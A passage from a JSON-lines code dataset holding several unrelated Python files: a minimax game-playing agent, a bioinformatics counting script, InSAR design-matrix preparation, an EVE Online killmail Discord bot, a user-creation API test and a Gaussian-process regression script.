actions_list\n \n def minimax_decision(self):\n utilityList = []\n temp_gamestate = copy.deepcopy(self.gamestate)\n \n my_action_list = self.find_my_possible_actions(temp_gamestate,1)\n currMax = -float('inf')\n for my_action in my_action_list:\n deepth = 0\n utility = self.min_value(my_action,temp_gamestate,deepth,currMax)\n utilityList.append(utility)\n if currMax < utility: currMax = utility\n print(my_action_list)\n print(utilityList)\n dicided_action = my_action_list[utilityList.index(max(utilityList))]\n return dicided_action\n\n def min_value(self,my_action,gamestate,deepth,currMax):\n deepth += 1\n #print(deepth)\n utilityList = []\n op_action_list = self.find_op_possible_actions(gamestate,0)\n currMin = float('inf')\n count = 0\n for op_action in op_action_list:\n count += 1\n utility = self.max_value(my_action,op_action,gamestate,deepth,currMin)\n utilityList.append(utility)\n try:\n if currMin > utility: currMin = utility\n except:\n print(\"catch op_action_list!\",op_action_list)\n print(\"catch op_action!\",op_action)\n print(\"catch previous my_action!\",my_action)\n print(\"catch deepth!!\",deepth)\n print(\"catch utility!!!\",utility)\n print(\"catch count!!!\",count)\n else:\n if currMax >= utility: break\n try:\n utility = min(utilityList)\n except ValueError:\n self.find_op_possible_actions(gamestate,0)\n print(\"catch error\",my_action)\n\n #print(op_action_list)\n #print(utilityList)\n else:\n count = 0\n return utility\n \n def max_value(self,my_action,op_action,gamestate,deepth,currMin):\n deepth += 1\n newstate = copy.deepcopy(gamestate)\n newstate.update(my_action,op_action)\n #print(newstate.op_pos_tokens)\n if self.isEnd(newstate,deepth):\n utility = self.new_evaluate(newstate)\n return utility\n else:\n my_action_list = self.find_my_possible_actions(newstate,0)\n utilityList = []\n count = 0\n currMax = -float('inf')\n for new_my_action in my_action_list:\n count += 1\n utility = self.min_value(new_my_action,newstate,deepth,currMax)\n utilityList.append(utility)\n try:\n if currMax < utility: currMax = utility\n except:\n print(\"catch my_action_list!\",my_action_list)\n print(\"catch new_my_action!\",new_my_action)\n print(\"catch previous my_action!\",my_action)\n print(\"catch previous op_action!\",op_action)\n print(\"catch 
deepth!!\",deepth)\n print(\"catch utility!!!\",utility)\n print(\"catch count!!!\",count)\n else:\n if currMin <= utility: break\n try:\n utility = max(utilityList)\n except ValueError:\n self.find_my_possible_actions(newstate,0)\n print(\"catch error\",my_action_list)\n else:\n return utility\n\n def isEnd(self,gamestate,deepth):\n if gamestate.mytokens_death_num == 9 or gamestate.optokens_death_num == 9 or deepth == 4 or self.isDraw(gamestate):\n return True\n else: return False\n \n def isDraw(self,gamestate):\n if gamestate.mytokens_on_num == 9 and gamestate.optokens_on_num == 9:\n my_tokens_type = []\n opponent_tokens_type = []\n for my_key in gamestate.mytokens:\n if gamestate.mytokens[my_key].state:\n my_tokens_type.append(gamestate.mytokens[my_key].type)\n for op_key in gamestate.optokens:\n if gamestate.optokens[op_key].state:\n opponent_tokens_type.append(gamestate.optokens[op_key].type)\n my_tokens_type = set(my_tokens_type)\n opponent_tokens_type = set(opponent_tokens_type)\n if len(my_tokens_type) == 1 and len(opponent_tokens_type) == 1 and len(my_tokens_type - opponent_tokens_type) == 0:\n return True\n if len(my_tokens_type) == 2 and len(opponent_tokens_type) == 2 and len(my_tokens_type - opponent_tokens_type) == 0:\n return True\n if (my_tokens_type == {'s','r'} and opponent_tokens_type == {'r'}) or (my_tokens_type == {'r'} and opponent_tokens_type == {'s','r'}):\n return True\n if (my_tokens_type == {'p','r'} and opponent_tokens_type == {'p'}) or (my_tokens_type == {'p'} and opponent_tokens_type == {'p','r'}):\n return True\n if (my_tokens_type == {'s','p'} and opponent_tokens_type == {'s'}) or (my_tokens_type == {'s'} and opponent_tokens_type == {'s','p'}):\n return True\n return False\n\n\n ##################################################################\n\n def juduge_releation(self, my_token, opponent_token):\n releation = -1\n if my_token['type'] == opponent_token['type']:\n releation = 0\n elif (my_token['type'] == 's' and opponent_token['type'] == 'p') or (my_token['type'] == 'p' and opponent_token['type'] == 'r') or (my_token['type'] == 'r' and opponent_token['type'] == 's'):\n releation = 1\n elif (my_token['type'] == 's' and opponent_token['type'] == 'r') or (my_token['type'] == 'p' and opponent_token['type'] == 's') or (my_token['type'] == 'r' and opponent_token['type'] == 'p'):\n releation = 2\n return releation\n\n\n\n\n\n ####################################################\n\n\n def cal_distance(self,my_token_pos,opponent_token_pos):\n \n r,q = my_token_pos\n i,j = opponent_token_pos\n row_dist = abs(r - i)\n dist = row_dist\n if r <= i:\n if q >= j and i+j >= q+r:\n dist += 0\n elif i+j < q+r:\n dist += abs((q + r) - (i + j))\n else:\n dist += abs(j - q)\n else:\n if q <= j and i+j <= q+r:\n dist += 0\n elif i+j > q+r:\n dist += abs((q + r) - (i + j))\n else:\n dist += abs(q - j)\n return dist\n#######################################3\n#如果棋子种类和目标地址是相同的剪枝,如果目标位置已有自己的棋子剪枝\n def my_action_cut_off(self,action_list,state):\n new_list = []\n position_dic = {}\n for action in action_list:\n if action[2] in state.my_pos_tokens:\n continue\n else:\n if action[0]==\"THROW\":\n type_position= (action[1],action[2])\n else:\n my_index = state.my_pos_tokens[action[1]][0]\n my_type = state.mytokens[my_index].type\n type_position = (my_type,action[2])\n if not type_position in position_dic:\n position_dic[type_position] = action\n #如果目标不为空首先保留swing,然后slide,然后throw\n elif action[0] == \"SWING\":\n position_dic[type_position] = action\n elif action[0] == \"SLIDE\" and 
position_dic[type_position][0] == \"THROW\":\n                    position_dic[type_position] = action\n                else:\n                    continue\n        new_list = list(position_dic.values())\n        if len(new_list) == 0:\n            print(\"my_old actions list\",action_list)\n        return new_list\n\n    def op_action_cut_off(self,action_list,state):\n        new_list = []\n        position_dic = {}\n        for action in action_list:\n            if action[2] in state.op_pos_tokens:\n                continue\n            else:\n                if action[0]==\"THROW\":\n                    type_position= (action[1],action[2])\n                else:\n                    op_index = state.op_pos_tokens[action[1]][0]\n                    op_type = state.optokens[op_index].type\n                    type_position = (op_type,action[2])\n                if type_position not in position_dic:\n                    position_dic[type_position] = action\n                # if the target cell is already claimed, prefer SWING, then SLIDE, then THROW\n                elif action[0] == \"SWING\":\n                    position_dic[type_position] = action\n                elif action[0] == \"SLIDE\" and position_dic[type_position][0] == \"THROW\":\n                    position_dic[type_position] = action\n                else:\n                    continue\n        new_list = list(position_dic.values())\n        if len(new_list) == 0:\n            print(\"old actions list\",action_list)\n        return new_list\n\n\n\n    def new_evaluate(self,gamestate):\n\n        utility = 0\n        \n        # score every one of my tokens against every enemy token: the same symbol has no effect; if mine beats theirs, the closer the better; if theirs beats mine, the farther the better\n        for my_key in gamestate.mytokens:\n            for op_key in gamestate.optokens:\n                if gamestate.mytokens[my_key].state :\n                    my_token = gamestate.mytokens[my_key]\n                    if gamestate.optokens[op_key].state :\n                        opponent_token = gamestate.optokens[op_key]\n                        relation = gamestate.get_relation(my_token, opponent_token)\n                        if relation == 0:\n                            continue\n                        elif relation == 1:\n                            distance = self.cal_distance(my_token.position, opponent_token.position)\n                            if distance == 0:\n                                return float('inf')\n                            utility += 1000/distance\n                        elif relation == 2:\n                            distance = self.cal_distance(my_token.position, opponent_token.position)\n                            if distance == 0:\n                                return -float('inf')\n                            utility -= 100/distance\n                        else:\n                            print(\"get_relation returned an unexpected result\")\n        # # the more of the opponent's token types we counter, the higher the score\n        # if gamestate.mytokens_s > gamestate.optokens_p and gamestate.optokens_p != 0:\n        #     utility += 10\n        # if gamestate.mytokens_r > gamestate.optokens_s and gamestate.optokens_p != 0:\n        #     utility += 10\n        # if gamestate.mytokens_p > gamestate.optokens_r and gamestate.optokens_p != 0:\n        #     utility += 10\n        # if gamestate.optokens_p > gamestate.mytokens_r and gamestate.mytokens_r != 0:\n        #     utility -= 10\n        # if gamestate.optokens_s > gamestate.mytokens_p and gamestate.mytokens_p != 0:\n        #     utility -= 10\n        # if gamestate.optokens_r > gamestate.mytokens_s and gamestate.mytokens_s != 0:\n        #     utility -= 10\n\n        # every token death shifts the utility by a large amount\n        utility -= 10000 * gamestate.mytokens_death_num\n        utility += 10000 * gamestate.optokens_death_num\n        if utility is None:\n            utility = -90000\n        return utility","sub_path":"test (2)/team_name_copy/player3.py","file_name":"player3.py","file_ext":"py","file_size_in_byte":38271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
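A note on cal_distance in player3.py above: it measures hex-grid distance on axial (r, q) coordinates by explicit case analysis. The same quantity has a compact closed form; the sketch below is illustrative only, and the name axial_distance plus the sample points are assumptions, not part of the original file.

# Closed-form axial hex distance, believed equivalent to cal_distance above.
def axial_distance(a, b):
    # On an axial (r, q) grid the distance is (|dr| + |dq| + |dr + dq|) / 2.
    dr, dq = a[0] - b[0], a[1] - b[1]
    return (abs(dr) + abs(dq) + abs(dr + dq)) // 2

assert axial_distance((0, 0), (0, 3)) == 3    # straight line along q
assert axial_distance((2, -1), (-1, 1)) == 3  # mixed direction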
new","sub_path":"geneticalgorithm/bounded/reinitialization.py","file_name":"reinitialization.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"308125488","text":"import bioLibCG\nimport cgNexusFlat\n\ndef countContext(targetList, alignmentFile, outFN):\n\n targets = set()\n f = open(targetList, 'r')\n for line in f:\n ls = line.strip().split('\\t')\n targets.add(ls[0])\n f.close()\n\n type_count = {}\n f = open(alignmentFile, 'r')\n for line in f:\n ls = line.strip().split('\\t')\n aID = ls[0]\n type = ls[17]\n \n if aID in targets:\n type_count[type] = type_count.get(type, 0) + 1\n \n f.close()\n\n f = open(outFN, 'w')\n for type in type_count:\n f.write('%s: %s\\n' % (type, type_count[type]))\n f.close()\n\n \n\nif __name__ == \"__main__\":\n import sys\n if sys.argv[1] == \"help\":\n bioLibCG.gd(sys.argv[0])\n else:\n bioLibCG.submitArgs(globals()[sys.argv[1]], sys.argv[1:])\n","sub_path":"endoClip/runK50GU/countContextTargets.py","file_name":"countContextTargets.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"632885296","text":"import numpy as np\nfrom datetime import datetime\nfrom numpy.linalg import pinv\n\n\n# def parpre_step(obs,shortbaseline,num,wavelen,slantran,incangle,\n# spa_r,spa_azi,width,lines,interval_r,interval_azi,radius,\n# ref_point=1,ref_slc=1):\n# '''\n# PARPRE is used to prepare the general input parameters for the estimators\n# \n# Input: obs-------------------observation file (range,azimuth,longitude,latitude,ifg1,ifg2,....)\n# shortbaseline---------baseline file (im1 im2 B_p, B_t)\n# num-------------------number of sampled points for joint detrend\n# wavelen---------------the wavelength of the SAR signal(meters)\n# slantran--------------the slant range to teh center pixel\n# incangle--------------the incidence angle (center pixel)\n# spa_r-----------------spatial resolution in range direction\n# spa_azi---------------spatial resolution in azimuth direction\n# width-----------------range samples of interferogram\n# lines-----------------azimuth lines of interferogram\n# interval_r------------the grid interval in range direction used for networking\n# interval_azi----------the grid interval in azimuth direction used for networking\n# radius----------------the searching radius used for networking\n# ref_point-------------reference point index\n# ref_slc---------------reference slc index\n#\n# Output: obs = observation file (range,azimuth,longitude,latitude,ifg1,ifg2,....)\n# Input.baseline = the spatial baseline of the selected interf.\n# Input.interval = the time span of the neighboring SLCs\n# Input.pindex = the pair index showing the construction of interf.\n# Input.tmatrix = the temporal matrix corresponding to the defo. 
rates\n# Input.wavelen = the wavelength of the SAR signal\n# Input.slantran = the slant range to teh center pixel\n# Input.incangle = the incidence angle (center pixel)\n# Input.spa_r = spatial resolution in range direction\n# Input.spa_azi = spatial resolution in azimuth direction\n# Input.width = range samples of interferogram\n# Input.lines = azimuth lines of interferogram\n# Input.interval_r=the grid interval in range direction used for networking\n# Input.interval_azi=the grid interval in azimuth direction used for networking\n# Input.radius = the searching radius used for networking\n# Input.ref_point= reference point index\n# Input.ref_slc = reference slc index\n# Input.date = SAR data acquisition date\n# Input.sb = shortbaseline file\n# Input.NTCP = number of TCP points\n# Input.num = number of sampled points for joint detrend\n# Input.NIFG = number of interferograms\n# Input.NSLC = number of SLC\n# Input.h2p = design matrix for topographic error\n# Input.T_year = vector of temporal interval in unit of year\n# Input.T_year_matrix= matrix of temporal interval in unit of year\n# Input.B_t = sparse matrix of temporal interval in unit of year\n# Input.B_t2p = design matrix for vi\n# Input.B_t2p_sum= design matrix for deformation rate\n# Input.B_vi = design matrix for both topographic error and vi\n# Input.B_v = design matrix for both topographic error and rate\n# Input.B_di = design matrix for both topographic error and di\n# Input.B_t2p_di = design matrix for di\n# Input.CoreNum = number of workers to start on local machine numworks in Matlab\n# Input.num_threshold= threshold of number of points to be discarded in subset detection\n# Input.patch_num_2= patch number index in subset detection (total patch number = (patch_num_2^2)*(patch_num_2^2))\n# Input.arc_threshold=threshold of residual for arcs to be removed\n# Input.NTCP_SAMP= number of TCP points in sample\n# Input.NARC = number of arcs\n# '''\n\nimport scipy.io as sio\nimport pandas as pd\nobs = sio.loadmat('obs.mat')['obs']\nshortbaseline = np.array(pd.read_csv('shortbaseline', delimiter='\\s+',\n names=['SCE1', 'SCE2', 'Bp', 'Bt']))\n\nnum,wavelen,slantran,incangle,spa_r,spa_azi,width,lines,interval_r,interval_azi,radius = \\\n 80000,0.031228381041666666,667425.0045,20.1048,11.181454768277943,11.313365,760,640,300,300,700\n\nref_point=1; ref_slc=1\n\nSCE12 = shortbaseline[:, [0, 1]]\nSCE = np.unique(SCE12).reshape(-1, 1)\nNSLC = len(SCE)\nNIFG, imp_size2 = SCE12.shape\ninput_pair_index = np.zeros((NIFG, imp_size2), dtype='int')\nfor i in range(NSLC):\n n = (SCE12 == SCE[i])\n input_pair_index[n] = i\n\n# create an interval matrix\nNinterval = NSLC - 1\ninput_matrix_t = np.zeros((NIFG, Ninterval))\nfor ii in range(NIFG):\n st = input_pair_index[ii, 0]\n ed = input_pair_index[ii, 1]\n input_matrix_t[ii, list(np.arange(st, ed))] = 1\n\n\nse_pair_index = np.hstack((np.arange(0, NSLC-1).reshape(-1, 1), np.arange(1, NSLC).reshape(-1, 1)))\nBp = shortbaseline[:, 2].reshape(-1, 1)\ninput_t_interval = np.zeros((Ninterval, 1))\n\nfor iii in range(Ninterval):\n s_d = datetime.strptime(str(int(SCE[iii])), '%Y%m%d')\n e_d = datetime.strptime(str(int(SCE[iii + 1])), '%Y%m%d')\n input_t_interval[iii] = (e_d - s_d).days\n\n## design matrix for dem error\nh2p = (-4 * np.pi / wavelen) * Bp / (slantran * np.sin(np.deg2rad(incangle)))\n\n## T_year\nT_year = (np.abs(input_t_interval) / 365).T\nT_year_matrix = np.tile(T_year, (NIFG, 1))\n\n## design matrix for coseismic deformation\nco_index = 1\ninv2inv_matrix = np.zeros((Ninterval, 
Ninterval))\nfor i in range(Ninterval):\n if i < co_index:\n inv2inv_matrix[i, i] = 1\n inv2inv_matrix[i, i+1] = -1\n elif i == co_index:\n inv2inv_matrix[i, i] = 1\n else:\n inv2inv_matrix[i, i] = 1\n inv2inv_matrix[i, i-1] = -1\nB_coseis_t2p_di = (-4*np.pi/wavelen)*(input_matrix_t@inv2inv_matrix)*1e-3\n\n## design matrix for coseismic deformation rate new\nco_index = 0\nif co_index == 0:\n inv_cosei_matrix = np.zeros((Ninterval, 2))\n inv_cosei_matrix[co_index, 0] = 1\n inv_cosei_matrix[co_index + 1:, 1] = 1\n# dead part\n# elseif\n# co_index == Ninterval\n# inv_cosei_matrix = zeros(Ninterval, 2);\n# inv_cosei_matrix(Ninterval, 2) = 1;\n# inv_cosei_matrix(1: co_index - 1, 1)=1;\n# else\n# inv_cosei_matrix = zeros(Ninterval, 3);\n# inv_cosei_matrix(co_index, 2) = 1;\n# inv_cosei_matrix(1: co_index - 1, 1)=1;\n# inv_cosei_matrix(co_index + 1: end, 3)=1;\n# end\n\n## design matrix for sequential ifg\nPROJ_LS = pinv(input_matrix_t.T @ input_matrix_t)@input_matrix_t.T\nBp_se = PROJ_LS @ Bp\nh2p_coef = (-4 * np.pi / wavelen) / (slantran * np.sin(np.deg2rad(incangle)))\nh2p_se = h2p_coef * Bp_se\n\n## design matrix for deforate\nB_t = input_matrix_t * T_year_matrix\nB_t_se = np.diag(T_year.squeeze())\nB_t_sum = np.sum(B_t, 1).reshape(-1, 1)\nB_t_se_sum = np.sum(B_t_se, 1).reshape(-1, 1)\nB_t2p = (-4 * np.pi / wavelen) * B_t * 1e-3\nB_t2p_se = (-4 * np.pi / wavelen) * B_t_se * 1e-3\nB_t2p_sum = (-4 * np.pi / wavelen) * B_t_sum * 1e-3\nB_t2p_se_sum = (-4 * np.pi / wavelen) * B_t_se_sum * 1e-3\nB_t2p_di = (-4 * np.pi / wavelen) * input_matrix_t * 1e-3\nB_t2p_vi_coseis = (-4 * np.pi / wavelen) * B_t @ inv_cosei_matrix * 1e-3\n\n## design matrix combination\nB_vi = np.hstack((h2p, B_t2p))\nB_vi_se = np.hstack((h2p_se, B_t2p_se))\nB_v = np.hstack((h2p, B_t2p_sum))\nB_v_se = np.hstack((h2p_se, B_t2p_se_sum))\nB_di = np.hstack((h2p, B_t2p_di))\nB_coseis_di = np.hstack((h2p, B_coseis_t2p_di))\n\n## temporal low pass deformation model\n#TODO: fix matrix indexing is flattened in matlab\nT_year_cum = np.cumsum(T_year)\nM = np.zeros((Ninterval, 3))\nM[:, 0] = 1\nM[0, 1] = T_year_cum[0] / 2\nM[0, 2] = T_year_cum[0]**2 / 6\nfor i in range(1, Ninterval):\n M[i, 1] = (T_year_cum[i] + T_year_cum[i-1])/2\n M[i, 2] = (T_year_cum[i]**3 - T_year_cum[i-1]**3)/6 / (T_year.squeeze()[i]+np.spacing(1)) #eps was outside in matlab\nB_t2pM = B_t2p @ M\nBM = np.hstack((h2p, B_t2pM))\nB_t_seM = B_t_se @ M\nB_t2p_seM = B_t2p_se @ M\nB_seM = np.hstack((h2p_se, B_t2p_seM))\n\n\n## parameters for subset detection\narc_threshold = 3 # 2.5, 1.5\n# CoreNum = 6 # feature('numcores')\nnum_threshold = 50\npatch_num_2 = 3 # (2 ^ 3) * (2 ^ 3) = 8 * 8 = 64\npatch_num_x = 3 # 32\npatch_num_y = 3 # 32\n\n## unique arc flag\nunique_arc_flag = 'par' # 'par' or 'obs'\nmerge_par_threshold = 3\nmerge_obs_threshold = 0.7\npatch_min_arcs = 50\nn_point_search = 50\nmin_win_ksize = 3 # unit: 2 km\nhight_diff_threshold = 1000 # unit m\n\n## save parameters\nInput = {}\nInput['baseline'] = Bp\nInput['interval'] = input_t_interval\nInput['pair_index'] = input_pair_index\nInput['se_pair_index'] = se_pair_index\nInput['tmatrix'] = input_matrix_t\nInput['wavelen'] = wavelen\nInput['slantran'] = slantran\nInput['incangle'] = incangle\nInput['date'] = SCE\nInput['sb'] = shortbaseline\nInput['NTCP'] = obs.shape[0]\nInput['maxheight'] = max(obs[:, 4])\nInput['minheight'] = min(obs[:, 4])\nInput['num'] = num\nInput['NIFG'] = NIFG\nInput['NSLC'] = NSLC\nInput['Nintv'] = Ninterval\nInput['h2p'] = h2p\nInput['h2p_se'] = h2p_se\nInput['T_year'] = 
T_year\nInput['T_year_matrix'] = T_year_matrix\nInput['B_t'] = B_t\nInput['B_t_sum'] = B_t_sum\nInput['B_t2p_sum'] = B_t2p_sum\nInput['B_t2p'] = B_t2p\nInput['B_vi'] = B_vi\nInput['B_v'] = B_v\nInput['B_di'] = B_di\nInput['B_t2p_di'] = B_t2p_di\nInput['co_index'] = co_index\nInput['inv2inv_matrix'] = inv2inv_matrix\nInput['B_coseis_t2p_di'] = B_coseis_t2p_di\nInput['B_coseis_di'] = B_coseis_di\nInput['B_t2p_vi_coseis'] = B_t2p_vi_coseis\nInput['B_t2p_se'] = B_t2p_se\nInput['B_t2pM'] = B_t2pM\nInput['BM'] = BM\nInput['B_t_seM'] = B_t_seM\nInput['B_t2p_seM'] = B_t2p_seM\nInput['B_seM'] = B_seM\nInput['B_t2p_se_sum'] = B_t2p_se_sum\nInput['B_v_se'] = B_v_se\nInput['B_vi_se'] = B_vi_se\n# Input['CoreNum'] = CoreNum #CoreNum removed as multi core is replaced with multi-processing\nInput['spa_r'] = spa_r\nInput['spa_azi'] = spa_azi\nInput['width'] = width\nInput['lines'] = lines\nInput['interval_r'] = interval_r\nInput['interval_azi'] = interval_azi\nInput['radius'] = radius\nInput['ref_point'] = ref_point\nInput['ref_slc'] = ref_slc\nInput['num_threshold'] = num_threshold\nInput['patch_num_2'] = patch_num_2\nInput['patch_num_x'] = patch_num_x\nInput['patch_num_y'] = patch_num_y\nInput['arc_threshold'] = arc_threshold\nInput['unique_arc_flag'] = unique_arc_flag\nInput['merge_par_threshold'] = merge_par_threshold\nInput['merge_obs_threshold'] = merge_obs_threshold\nInput['patch_min_arcs'] = patch_min_arcs\nInput['n_point_search'] = n_point_search\nInput['minw_ksize'] = min_win_ksize\nInput['hdiff_T'] = hight_diff_threshold\n\n # return Input\n","sub_path":"test_run/jointmodel_data/parpre_step.py","file_name":"parpre_step.py","file_ext":"py","file_size_in_byte":11174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"645110227","text":"from firetail.lib import db\nfrom firetail.utils import make_embed\nimport asyncio\n\n\nclass Killmails:\n def __init__(self, bot):\n self.bot = bot\n self.session = bot.session\n self.config = bot.config\n self.logger = bot.logger\n self.loop = asyncio.get_event_loop()\n self.loop.create_task(self.tick_loop())\n\n async def tick_loop(self):\n await self.bot.wait_until_ready()\n while not self.bot.is_closed():\n try:\n data = await self.request_data()\n if data['killID']:\n await self.process_data(data)\n else:\n await asyncio.sleep(15)\n await asyncio.sleep(1)\n except:\n await asyncio.sleep(5)\n\n async def process_data(self, kill_data):\n config = self.config\n km_groups = config.killmail['killmailGroups']\n big_kills = config.killmail['bigKills']\n big_kills_value = config.killmail['bigKillsValue']\n # Foreach thru all provided groups\n for group in km_groups:\n killmail_group_id = int(config.killmail['killmailGroups'][group]['id'])\n channel_id = config.killmail['killmailGroups'][group]['channelId']\n loss = config.killmail['killmailGroups'][group]['lossMails']\n # Skip npc\n if kill_data['zkb']['npc'] or not kill_data['killmail']['victim']['corporation_id']:\n break\n # Get all group id's from the mail\n group_ids = []\n if loss:\n group_ids.append(int(kill_data['killmail']['victim']['corporation_id']))\n if 'alliance_id' in kill_data['killmail']['victim']:\n group_ids.append(int(kill_data['killmail']['victim']['alliance_id']))\n for attacker in kill_data['killmail']['attackers']:\n if 'corporation_id' in attacker:\n group_ids.append(int(attacker['corporation_id']))\n if 'alliance_id' in attacker:\n group_ids.append(int(attacker['alliance_id']))\n if killmail_group_id in group_ids:\n await 
self.process_kill(channel_id, kill_data)\n for ext in self.bot.extensions:\n if 'add_kills' in ext:\n sql = \"SELECT * FROM zkill\"\n other_channels = await db.select(sql)\n for zkill in other_channels:\n print(zkill[3])\n print(group_ids)\n if zkill[3] in group_ids:\n await self.process_kill(zkill[1], kill_data)\n if kill_data['zkb']['totalValue'] >= big_kills_value and big_kills:\n channel_id = config.killmail['bigKillsChannel']\n await self.process_kill(channel_id, kill_data, True)\n\n async def process_kill(self, channel_id, kill_data, big=False):\n bot = self.bot\n kill_id = kill_data['killID']\n kill_time = kill_data['killmail']['killmail_time'].split('T', 1)[1][:-4]\n value_raw = kill_data['zkb']['totalValue']\n value = '{0:,.2f}'.format(float(value_raw))\n try:\n victim_id = kill_data['killmail']['victim']['character_id']\n victim_name = await self.bot.esi_data.character_name(victim_id)\n except:\n victim_name = None\n ship_lost_id = kill_data['killmail']['victim']['ship_type_id']\n ship_lost_raw = await self.bot.esi_data.type_info_search(ship_lost_id)\n ship_lost = ship_lost_raw['name']\n victim_corp_id = kill_data['killmail']['victim']['corporation_id']\n victim_corp_raw = await self.bot.esi_data.corporation_info(victim_corp_id)\n victim_corp = victim_corp_raw['name']\n try:\n victim_alliance_id = kill_data['killmail']['victim']['alliance_id']\n victim_alliance_raw = await self.bot.esi_data.alliance_info(victim_alliance_id)\n victim_alliance = victim_alliance_raw['name']\n except:\n victim_alliance = None\n solar_system_id = kill_data['killmail']['solar_system_id']\n solar_system_info = await self.bot.esi_data.system_info(solar_system_id)\n solar_system_name = solar_system_info['name']\n if '-' in solar_system_name:\n solar_system_name = solar_system_name.upper()\n title = ship_lost + \" Destroyed in \"\n if big:\n title = \"BIG KILL REPORTED: \" + ship_lost + \" Destroyed in \"\n em = make_embed(msg_type='info', title=title.title() + str(solar_system_name),\n title_url=\"https://zkillboard.com/kill/\" + str(kill_id) + \"/\",\n content='Killed At: ' + kill_time + ' EVE')\n em.set_footer(icon_url=self.bot.user.avatar_url,\n text=\"Provided Via firetail Bot + ZKill\")\n em.set_thumbnail(url=\"https://image.eveonline.com/Type/\" + str(ship_lost_id) + \"_64.png\")\n if victim_name is not None and victim_alliance is not None:\n em.add_field(name=\"Victim\",\n value=\"Name: \" + str(victim_name) + \"\\nShip Value: \" + value + \" \\nCorp: \" + str(victim_corp) +\n \" \\nAlliance: \" + str(victim_alliance) + \" \\n \")\n elif victim_name is not None and victim_alliance is None:\n em.add_field(name=\"Victim\",\n value=\"Name: \" + str(victim_name) + \"\\nShip Value: \" + value + \" \\nCorp: \" + str(victim_corp))\n elif victim_name is None and victim_alliance is not None:\n em.add_field(name=\"Structure Info\",\n value=\"Structure Value: \" + value + \"\\nCorp: \" + str(victim_corp) + \" \\nAlliance: \" +\n str(victim_alliance) + \" \\n \")\n elif victim_name is None and victim_alliance is None:\n em.add_field(name=\"Structure Info\",\n value=\"Structure Value: \" + value + \"\\nCorp: \" + str(victim_corp))\n try:\n channel = bot.get_channel(int(channel_id))\n except:\n return self.logger.info('Killmail - Bad Channel Attempted {}'.format(channel_id))\n self.logger.info(('Killmail - Kill # {} has been posted to {}'\n '').format(kill_id, channel.name))\n await channel.send(embed=em)\n\n async def request_data(self):\n base_url = \"https://redisq.zkillboard.com\"\n zkill = 
\"{}/listen.php?queueID={}\".format(base_url, self.bot.user.id)\n async with self.bot.session.get(zkill) as resp:\n data = (await resp.json())['package']\n try:\n if data.get('killID'):\n return data\n except:\n return None\n","sub_path":"firetail/extensions/killmails/killmails.py","file_name":"killmails.py","file_ext":"py","file_size_in_byte":6732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"335388168","text":"import random\nimport requests\nimport string\n\nfrom utility import Utility\n\nutil = Utility()\n\n\nclass TestUsersApi(object):\n\n def test_create_user(self):\n username = \"\".join(\n random.choice(string.ascii_lowercase) for _ in range(8))\n user = {\n \"username\": username,\n \"password\": username,\n \"displayName\": username,\n \"lastName\": \"\",\n \"email\": username + \"@example.com\",\n \"role\": \"USER\"\n }\n post = requests.post(util.apiurl() + \"/users\", json=user,\n headers=util.headers())\n assert post.status_code == 201, \"Status code of POST on /users endpoint was not 201\"\n res = post.json()\n assert res[\"username\"] == user[\n \"username\"], \"Incorrect username of created user\"\n assert res[\"displayName\"] == user[\n \"displayName\"], \"Incorrect displayName of created user\"\n assert res[\"lastName\"] == user[\n \"lastName\"], \"Incorrect lastName of created user\"\n assert res[\"email\"] == user[\"email\"], \"Incorrect email of created user\"\n assert res[\"role\"] == user[\"role\"], \"Incorrect role of created user\"\n","sub_path":"pytest/test_users_api.py","file_name":"test_users_api.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"260525169","text":"from GP_REBOOT import GPR_reboot\nimport numpy as np\nimport matplotlib.pylab as plt\n\n\ndef f1(x):\n return np.sin(x.T)\n#%% IMPOSTAZIONE PROBLEMA\n\n#f = lambda x: np.cos(.7*x).flatten()\n\nN = 50 # numero punti training\nn = 1000 # numero punti test\ns = 0.1 # noise variance\n\nrng = np.random.RandomState(2)\nx = np.squeeze(rng.uniform(-5, 5, size = (N,1)))\nx_guess = np.linspace(-5, 5, n)\ny = f1(x) + s*np.random.randn(N)\n#%%\n# PLOT MISURE\nplt.figure()\nplt.title(\"Misure\")\nax = plt.gca()\ncosine, = ax.plot(x_guess, f1(x_guess))\nmeasures = plt.scatter(x,y, c = \"black\")\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.legend([cosine, measures], [\"f(x)\", \"punti training\"])\nplt.savefig('misure.png', bbox_inches='tight')\n\n#%%\ngaus = GPR_reboot(x,y,\n x_guess,\n kernel=GPR_reboot.gaussian_kernel,\n kernel_params = {'const': 10,\n 'length': 5},\n R =s)\n#%%\n#predictor\npreds = gaus.predict()\n\n\ngaus.plot(axlabels = [\"x\", \"y\"],title = 'pred1', save = \"test_figure\")\n\npreds2 = gaus.predict2()\n\ngaus.plot(axlabels = [\"x\", \"y\"],title = 'pred2', save = \"test_figure\")\n\n#%%\n\n#%%\noptimizer_params = {'const': np.log(1),\n 'length': np.log(10)}\n\nmin_results = gaus.optimizer(mode='CG',param_x0 = optimizer_params)\n#%%\n\nmin_results = gaus.optimizer(mode='Newton-CG',param_x0 = optimizer_params)\n#%%\noptimized_params, logp = gaus.optimizer(mode='Nelder-Mead',param_x0 = optimizer_params)\n\n#%%\noptimizer_ranges = {'const': (0,10),\n 'length': (0,10)}\n#\noptimized_params, logp, grid, grid_values = gaus.optimizer(ranges_dict = optimizer_ranges,\n mode = \"brute\",\n Ns = 500,\n output_grid = True)\n\n#%%\ngaus.update_params(optimized_params)\npreds2 = gaus.predict()\ngaus.plot(title = \"after optim\",axlabels = [\"x\", 
